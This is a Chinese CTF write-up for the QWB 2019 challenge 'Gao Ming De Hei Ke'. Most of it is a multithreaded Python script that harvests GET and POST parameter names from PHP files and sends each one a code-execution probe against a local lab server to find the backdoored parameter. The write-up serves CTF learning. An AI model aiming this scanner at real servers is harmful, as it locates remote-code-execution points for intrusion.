[强网杯 2019]高明的黑客

附件下载下来后文件很多，逐个手工审计不现实，所以用多线程脚本去跑。

# import re
# #正则表达式的模块
# import os
# import requests

# files=os.listdir('E://phpstudy/phpstudy_pro/WWW/src')
# reg=re.compile(r'(?<=_GET\[\').*(?=\'\])')
# for i in files:
#     url='http://127.0.0.1/src/'+i
#     f=open('E://phpstudy/phpstudy_pro/WWW/src/'+i)
#     data=f.read()
#     f.close()
#     result=reg.findall(data)
#     for j in result:
#         payload=url+'?'+j+'=echo *****'
#         print(payload)
#         html = requests.get(payload)
#         if '*****' in html.text:
#             print(payload)
#             exit(1)


import os
import requests
import re
import threading
import time


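# Banner with the scan's start time; purely cosmetic.
print('开始时间:  ' + time.asctime(time.localtime(time.time())))

# Upper bound on worker threads that may be inside get_content() at once.
MAX_THREADS = 100
s1 = threading.Semaphore(MAX_THREADS)

# Local copy of the challenge's src/ directory. The PHP sources are read from
# disk to harvest parameter names, and the same files are then requested over
# HTTP at http://127.0.0.1/src/<file>. Only ever point this at a lab instance
# you own: every parameter of every file receives a code-execution probe.
filePath = r'E://phpstudy/phpstudy_pro/WWW/src'
os.chdir(filePath)
# Regular files only: os.listdir() also returns sub-directories, which a
# worker would otherwise try to open() and die on.
files = [name for name in os.listdir(filePath)
         if os.path.isfile(os.path.join(filePath, name))]

# NOTE: the original assigned requests.adapters.DEFAULT_RETRIES = 5 and
# session.keep_alive = False. Neither does anything: HTTPAdapter binds its
# max_retries default when the class is defined, and Session has no keep_alive
# attribute, so the assignment is just an unused instance attribute. Mount an
# adapter explicitly instead, with the retry count the author wanted and a
# pool sized for the thread count so urllib3 stops discarding connections.
session = requests.Session()
adapter = requests.adapters.HTTPAdapter(pool_connections=MAX_THREADS,
                                        pool_maxsize=MAX_THREADS,
                                        max_retries=5)
session.mount('http://', adapter)
session.mount('https://', adapter)
# What keep_alive=False was meant to achieve: ask the server to close the
# connection after each response instead of holding hundreds of them open.
session.headers['Connection'] = 'close'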

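# Parameter-name extractors for the two PHP superglobals the challenge uses.
# Raw strings: the original '\$_GET\[...' form relies on Python passing
# unknown escapes through, which is a DeprecationWarning today.
_GET_RE = re.compile(r"\$_GET\['(.*?)'\]")
_POST_RE = re.compile(r"\$_POST\['(.*?)'\]")

# Probe payload and the marker it prints. A parameter is considered exploitable
# when the marker comes back in the response, i.e. the value reached an
# eval()/system()-style sink. Detection is a plain substring match, so a page
# whose normal output already contains the marker would be a false positive.
_MARKER = "xxxxxx"
_PAYLOAD = "echo 'xxxxxx';"

# Per-request timeout in seconds. Without one a single hung request pins a
# worker (and its semaphore slot) forever, and the scan silently stalls.
_TIMEOUT = 10


def _extract_params(file):
    """Return (get_names, post_names) harvested from one PHP source file.

    Reads the file exactly once. The original called f.read() twice, and the
    second call returned '' -- so no $_POST parameter was ever extracted.
    """
    with open(file, encoding='utf-8', errors='replace') as f:
        source = f.read()
    return _GET_RE.findall(source), _POST_RE.findall(source)


def _reflects_marker(resp):
    """Return True if the response body contains the probe marker.

    Decodes as UTF-8 (the page's encoding) and closes the response so the
    connection goes back to the pool.
    """
    resp.encoding = 'utf-8'
    text = resp.text
    resp.close()
    return _MARKER in text


def get_content(file):
    """Probe one PHP file under http://127.0.0.1/src/ for a code-execution sink.

    Strategy: send the payload in *every* GET and POST parameter at once; if
    the marker never comes back the file is skipped after a single request.
    Only when that combined shot hits do we re-test the parameters one by one
    (GET first, then POST) to name the responsible one.

    Args:
        file: file name relative to the current directory (the local src/ copy);
            the same name is used as the URL path component.

    Side effects: HTTP requests against the local target, progress/result
    lines on stdout. Concurrency is bounded by the module-level semaphore
    ``s1``; it is held via ``with`` so it is released even when open() or
    a request raises (the original acquire()/release() pair leaked the slot
    on any exception, eventually deadlocking every other worker).
    """
    with s1:
        print('trying   ' + file + '     ' + time.asctime(time.localtime(time.time())))
        gets, posts = _extract_params(file)
        if not gets and not posts:
            return  # nothing to inject into; don't waste a request
        url = 'http://127.0.0.1/src/' + file

        resp = session.post(url,
                            data={n: _PAYLOAD for n in posts},
                            params={m: _PAYLOAD for m in gets},
                            timeout=_TIMEOUT)
        if not _reflects_marker(resp):
            return

        # Narrow down to the single parameter that triggers execution.
        # `params=` lets requests percent-encode the payload instead of
        # splicing raw quotes and spaces into the URL as the original did.
        param = None
        for name in gets:
            resp = session.get(url, params={name: _PAYLOAD}, timeout=_TIMEOUT)
            if _reflects_marker(resp):
                param = name
                break
        if param is None:
            for name in posts:
                resp = session.post(url, data={name: _PAYLOAD}, timeout=_TIMEOUT)
                if _reflects_marker(resp):
                    param = name
                    break

        if param is None:
            # The combined request hit but no single parameter did on retest.
            # The original fell through to `param = b` here, which is either a
            # NameError (no POST params) or the wrong name; report honestly.
            print('找到了利用文件: ' + file + "  但单个参数复测未命中")
        else:
            print('找到了利用文件: ' + file + "  and 找到了利用的参数:%s" % param)
        print('结束时间:  ' + time.asctime(time.localtime(time.time())))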

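# Fan out one worker per file; the semaphore inside get_content caps how many
# actually run concurrently. Keep the handles and join them so the main thread
# waits for every probe to finish -- the original just fell off the end, so
# there was no signal at all when the whole scan completed without a hit.
workers = []
for name in files:
    worker = threading.Thread(target=get_content, args=(name,))
    worker.start()
    workers.append(worker)
for worker in workers:
    worker.join()
print('结束时间:  ' + time.asctime(time.localtime(time.time())))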